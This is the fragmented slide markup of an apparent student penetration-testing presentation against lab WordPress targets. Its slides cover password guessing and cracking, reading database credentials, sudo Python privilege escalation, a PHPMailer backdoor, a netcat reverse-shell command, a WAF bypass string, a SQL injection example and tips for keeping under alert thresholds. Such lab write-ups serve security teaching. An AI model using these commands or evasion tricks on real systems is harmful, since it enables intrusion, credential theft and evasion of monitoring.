            <a:off x="-32392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1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12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9" name="Google Shape;1589;p12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90" name="Google Shape;1590;p12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1" name="Google Shape;1591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2" name="Google Shape;1592;p12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3" name="Google Shape;1593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94" name="Google Shape;1594;p121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595" name="Google Shape;1595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96" name="Google Shape;1596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7" name="Google Shape;1597;p121"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="31342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8" name="Google Shape;1598;p121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9" name="Google Shape;1599;p121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0" name="Google Shape;1600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1" name="Google Shape;1601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2" name="Google Shape;1602;p121"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="333" y="45278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3" name="Google Shape;1603;p121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4" name="Google Shape;1604;p121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05" name="Google Shape;1605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6" name="Google Shape;1606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7" name="Google Shape;1607;p121"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="5" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5922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8" name="Google Shape;1608;p121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9" name="Google Shape;1609;p121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0" name="Google Shape;1610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1" name="Google Shape;1611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2" name="Google Shape;1612;p121"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="6" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-333" y="73166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3" name="Google Shape;1613;p121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4" name="Google Shape;1614;p121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15" name="Google Shape;1615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6" name="Google Shape;1616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7" name="Google Shape;1617;p121"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="7" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="67" y="87102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8" name="Google Shape;1618;p121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9" name="Google Shape;1619;p121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0" name="Google Shape;1620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1" name="Google Shape;1621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2" name="Google Shape;1622;p121"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="8" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-133" y="10103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121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121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25" name="Google Shape;1625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6" name="Google Shape;1626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7" name="Google Shape;1627;p121"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="9" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="67" y="115656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2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0" name="Google Shape;1630;p12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31" name="Google Shape;1631;p12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2" name="Google Shape;1632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33" name="Google Shape;1633;p12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4" name="Google Shape;1634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5" name="Google Shape;1635;p122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6" name="Google Shape;1636;p122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37" name="Google Shape;1637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8" name="Google Shape;1638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9" name="Google Shape;1639;p122"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32258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0" name="Google Shape;1640;p122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1" name="Google Shape;1641;p122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2" name="Google Shape;1642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3" name="Google Shape;1643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4" name="Google Shape;1644;p122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122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6" name="Google Shape;1646;p122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47" name="Google Shape;1647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9" name="Google Shape;1649;p122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0" name="Google Shape;1650;p122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1" name="Google Shape;1651;p122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2" name="Google Shape;1652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4" name="Google Shape;1654;p122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5" name="Google Shape;1655;p122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6" name="Google Shape;1656;p122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57" name="Google Shape;1657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9" name="Google Shape;1659;p122"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="7" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32324" y="5694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122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1" name="Google Shape;1661;p122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2" name="Google Shape;1662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4" name="Google Shape;1664;p122"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="8" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32658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122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6" name="Google Shape;1666;p122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67" name="Google Shape;1667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8" name="Google Shape;1668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9" name="Google Shape;1669;p122"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="9" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32791" y="3357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0" name="Google Shape;1670;p122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1" name="Google Shape;1671;p122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2" name="Google Shape;1672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3" name="Google Shape;1673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4" name="Google Shape;1674;p122"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="13" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32791" y="4525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76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7.xml"/><Relationship Id="rId42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0.xml"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout123.xml"/><Relationship Id="rId45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48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout125.xml"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout124.xml"/><Relationship Id="rId49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16.xml"/><Relationship Id="rId38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06.xml"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout128.xml"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout127.xml"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme4.xml"/><Relationship Id="rId5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26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  <p:sldLayoutId id="2147483775" r:id="rId48"/>
    <p:sldLayoutId id="2147483776" r:id="rId49"/>
    <p:sldLayoutId id="2147483777" r:id="rId50"/>
    <p:sldLayoutId id="2147483778" r:id="rId51"/>
    <p:sldLayoutId id="214748377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4.png"/><Relationship Id="rId4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9" name="Google Shape;2319;p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0" name="Google Shape;2320;p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Created by: Jason Settlecowski, Peter Nashaat, Ouassim Djida, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Lane Schoof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u="sng"/>
              <a:t>Exploitation:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> Weak Password Requirements</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2401" name="Google Shape;2401;p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2" name="Google Shape;2402;p10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703375" y="2295400"/>
            <a:ext cx="22942801" cy="10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Guessing passwords at random granted a user shell for Michael through a weak password – “ michael “</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228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406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62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And once Steven’s password hash was found, it was cracked within seconds – “ pink84 “</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2403" name="Google Shape;24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266" y="4010692"/>
            <a:ext cx="12368986" cy="373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Google Shape;240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8383" y="9618292"/>
            <a:ext cx="18540883" cy="27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1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u="sng"/>
              <a:t>Exploitation:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> Improper Access Control</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2410" name="Google Shape;2410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1" name="Google Shape;2411;p11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First, we remotely accessed the server through SSH using Michael’s credentials:</a:t>
            </a:r>
            <a:endParaRPr/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71500" lvl="0" marL="977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user had read/write privileges for the WordPress configuration file        (wp-config.php) and was able to see the WordPress database username and password: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12" name="Google Shape;24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7827" y="3198898"/>
            <a:ext cx="12121863" cy="365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p11"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="39208" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6127827" y="8502998"/>
            <a:ext cx="13265524" cy="365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Improper Access Control</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2419" name="Google Shape;2419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0" name="Google Shape;2420;p12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Now the unauthorized user was able to log in to the WordPress database using the MySQL module:</a:t>
            </a:r>
            <a:endParaRPr/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Traversing the database tables revealed the hashed passwords for the users:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2421" name="Google Shape;2421;p12"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="56716" l="0" r="8599" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5326843" y="3982535"/>
            <a:ext cx="13723831" cy="287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Google Shape;2422;p12"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="26440" l="0" r="25492" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4359423" y="7850606"/>
            <a:ext cx="15658673" cy="409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u="sng"/>
              <a:t>Exploitation:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> Improper Privilege Management</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2428" name="Google Shape;2428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9" name="Google Shape;2429;p13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71500" lvl="0" marL="977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Armed with Steven’s credentials, we were again able to SSH into the server and check our permissions, revealing the ability to run Python scripts:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="977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292100" lvl="0" marL="977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292100" lvl="0" marL="977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71500" lvl="0" marL="977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With this we were able to gain root access, and now had full control of the server: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30" name="Google Shape;24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823" y="4064231"/>
            <a:ext cx="11858003" cy="27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1" name="Google Shape;243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9226" y="8153754"/>
            <a:ext cx="12539065" cy="109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Google Shape;2432;p13"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="89124" l="0" r="33191" t="5581"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5919226" y="9245237"/>
            <a:ext cx="7435827" cy="466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438" name="Google Shape;2438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9" name="Google Shape;2439;p14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-508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400"/>
              <a:t>In addition to Target 1’s vulnerabilities, we </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400"/>
              <a:t>uncovered the following critical vulnerabilities in </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="4400"/>
              <a:t>Target 2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440" name="Google Shape;2440;p14"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1176987" y="57787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{AB76892F-4A5C-4B29-B97E-A2BCD0243B9D}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="5540350"/>
                <a:gridCol w="10480425"/>
                <a:gridCol w="5974825"/>
              </a:tblGrid>
              <a:tr h="113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/>
                </a:tc>
              </a:tr>
              <a:tr h="113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2016-10033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44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 - 77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Command Injection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44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5" name="Google Shape;24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1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p1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Used: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Target 2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48" name="Google Shape;2448;p15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-379452" y="17585"/>
            <a:ext cx="25108452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lang="en-US" u="sng">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exploitation:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Exposure of Information through Directory Listing</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2454" name="Google Shape;2454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5" name="Google Shape;2455;p16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Passive recon again performed by browsing user-facing website.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For active recon we employed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>multiple</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> tools such as Nmap for a service and version scan, along with the operating system running on the machine:</a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1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56" name="Google Shape;24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075" y="4914900"/>
            <a:ext cx="15495500" cy="80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f9c6693cea_2_1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-379452" y="17585"/>
            <a:ext cx="251085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dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exposure of Information through Directory Listing</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2462" name="Google Shape;2462;gf9c6693cea_2_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3" name="Google Shape;2463;gf9c6693cea_2_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1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Nikto was used to create a list of URLs that Target 2 HTTP server exposed:</a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1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64" name="Google Shape;2464;gf9c6693cea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25" y="3129925"/>
            <a:ext cx="23934001" cy="548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gf9c6693cea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25" y="8614800"/>
            <a:ext cx="23934001" cy="275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f9c6693cea_2_9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-379452" y="17585"/>
            <a:ext cx="251085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dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exposure of Information through Directory Listing</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2471" name="Google Shape;2471;gf9c6693cea_2_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2" name="Google Shape;2472;gf9c6693cea_2_9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="575875" y="2396638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An even more in-depth enumeration using Gobuster revealed the presence of the vulnerable WordPress website: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73" name="Google Shape;2473;gf9c6693cea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750" y="4086450"/>
            <a:ext cx="22246150" cy="886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f9c6693cea_2_25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-379452" y="17585"/>
            <a:ext cx="251085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Exposure of Information through Directory Listing</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2479" name="Google Shape;2479;gf9c6693cea_2_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0" name="Google Shape;2480;gf9c6693cea_2_2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Searchsploit proved valuable by showing exploit modules for PHPMailer, specifically Remote Code Execution (PHP) for versions earlier than 5.2.18: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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>allowed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> us to use an exploit shell which created a backdoor.php, able to execute commands via HTTP.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81" name="Google Shape;2481;gf9c6693cea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00" y="3894500"/>
            <a:ext cx="23319349" cy="59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27" name="Google Shape;2327;p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28" name="Google Shape;2328;p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9" name="Google Shape;2329;p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330" name="Google Shape;2330;p2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331" name="Google Shape;2331;p2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2332" name="Google Shape;2332;p2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Methods Used to Avoid Detection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f9c6693cea_2_42"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-379452" y="17585"/>
            <a:ext cx="251085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u="sng">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exploitation: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Remote Code Execution</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2487" name="Google Shape;2487;gf9c6693cea_2_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8" name="Google Shape;2488;gf9c6693cea_2_4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allowed us to use an exploit shell which created a backdoor.php, able to execute commands via HTTP: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 test of the backdoor revealed proper exploitation. Here we view the /etc/passwd directory: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89" name="Google Shape;2489;gf9c6693cea_2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375" y="4055613"/>
            <a:ext cx="16881350" cy="11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gf9c6693cea_2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375" y="7469550"/>
            <a:ext cx="15837356" cy="4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gf9c6693cea_2_51"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-379452" y="17585"/>
            <a:ext cx="251085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u="sng">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exploitation: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Command Injection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2496" name="Google Shape;2496;gf9c6693cea_2_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7" name="Google Shape;2497;gf9c6693cea_2_51"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703375" y="2295400"/>
            <a:ext cx="22942800" cy="103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Establishing remote code execution, now we used Ncat which allowed us to remotely connect to the server itself. First we established the Kali machine as a ‘listener’ on port 4444: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Now we insert into the URL: nc 192.168.1.115 4444 -e /bin/bash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makes Target 2 broadcast to port 4444 and establish a connection.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98" name="Google Shape;2498;gf9c6693ce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850" y="4562625"/>
            <a:ext cx="13570150" cy="25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gf9c6693cea_2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51" y="8414275"/>
            <a:ext cx="23147651" cy="196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f9c6693cea_2_62"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-379452" y="17585"/>
            <a:ext cx="251085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dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Command Injection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2505" name="Google Shape;2505;gf9c6693cea_2_6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6" name="Google Shape;2506;gf9c6693cea_2_62"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703375" y="2295400"/>
            <a:ext cx="22942800" cy="103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Now that the remote connection has been established, we can traverse the directories at will to find the desired confidential information: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-US" sz="3800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Flag 3 could be seen at ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3800" u="sng">
                <a:solidFill>
                  <a:srgbClr val="4A86E8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>192.168.1.115/wordpress/wp-content/uploads/2018/11/flag3.png</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:endParaRPr sz="3800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2507" name="Google Shape;2507;gf9c6693cea_2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75" y="3849825"/>
            <a:ext cx="11041925" cy="22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gf9c6693cea_2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875" y="6326850"/>
            <a:ext cx="9830775" cy="31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gf9c6693cea_2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875" y="9711100"/>
            <a:ext cx="14862175" cy="10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4" name="Google Shape;25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15" name="Google Shape;2515;p1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1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7" name="Google Shape;2517;p17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32725" y="229500"/>
            <a:ext cx="24443100" cy="24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Exposure of Information through Directory Listing</a:t>
            </a:r>
            <a:endParaRPr sz="8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3" name="Google Shape;2523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4" name="Google Shape;2524;p18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An “Excessive HTTP Errors” alert would show many failed connections over a short period of time.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alert is triggered when the HTTP 400 status code errors show in the top five codes within the last five minutes.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WHEN count() GROUPED OVER top 5 'http.response.status_code' IS ABOVE 400 FOR THE LAST 5 minutes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Executing nmap -sS (stealthy scan) on specific ports will cause few 400 errors.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Enabling passive detection mode with WPScan lowers the chance of detection.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f9c6693cea_2_73"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32725" y="204000"/>
            <a:ext cx="24443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Remote Code Execution</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2530" name="Google Shape;2530;gf9c6693cea_2_7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1" name="Google Shape;2531;gf9c6693cea_2_73"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703375" y="2295400"/>
            <a:ext cx="22942800" cy="106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An “HTTP Request Size Monitor” alert shows the amount of data being transferred from all documents.</a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-501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alert is triggered when the sum of data from HTTP requests is &gt; 3.5 KB over the past minute.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WHEN sum() of http.request.bytes over ALL DOCUMENTS is ABOVE 3500 FOR THE LAST 1 minute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Keep data transfer rates below 3.5 KB/min to avoid this particular threshold.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f9c6693cea_2_79"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32725" y="204000"/>
            <a:ext cx="24443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Command Injection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2537" name="Google Shape;2537;gf9c6693cea_2_7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8" name="Google Shape;2538;gf9c6693cea_2_7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 Web Application Firewall acts as the IDS/IPS for Layer 7 Application security, and filters incoming traffic based on special characters and phrases</a:t>
            </a:r>
            <a:endParaRPr sz="40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They filter incoming traffic based on special characters like ‘/’ and ‘?’ or ‘passwd’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HTTP requests containing filtered content will be dropped or blocked.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can be bypassed by using uninitialized variables in PHP code.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cd%20/etc/pass$uwd would bypass the filtered ‘passwd’ rule, and a connection could still be made.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20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32725" y="204000"/>
            <a:ext cx="24443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SQL Database Exploita</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>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Improper Access Control</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2544" name="Google Shape;254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5" name="Google Shape;2545;p20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="717425" y="2257975"/>
            <a:ext cx="22942800" cy="10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3400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Monitoring Overview</a:t>
            </a:r>
            <a:endParaRPr sz="34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Which method thwarts this exploitation? Input Validation utilizing s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3300">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tored procedures that perform data validation.</a:t>
            </a:r>
            <a:endParaRPr sz="33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What is the methodology </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3300">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>behind</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3300">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> this method? Stored Procedure measure the validity of data by accepting data as a parameter and comparing it to stored procedures that have been dubbed non-malicious.</a:t>
            </a:r>
            <a:endParaRPr sz="33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Which threshold does it fire at? Stored Procedures fire at 1 and immediately associate the string as malicious due to the execution of certain statements within a SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3300">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>database</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3300">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> resulting in the retrieval of confidential data. Ex: ‘ or ‘1’=’1’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b="1" lang="en-US" sz="3300">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Mitigating Detection</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="33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How can you execute the same exploit ? Narrow tailor the statement that you are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3300">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>querying</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3300">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> the database so that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3300">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the stored procedure has not previously been introduced to it and deemed it as malicious</a:t>
            </a:r>
            <a:endParaRPr sz="33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Are there alternative exploits that may perform better? An alternative to narrowly tailoring the statement is to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3300">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>perform</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3300">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3300">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>reconnaissance</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3300">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> on the input validation that the SQL database is employing. Through this </a:t>
            </a:r>
            <a:r>
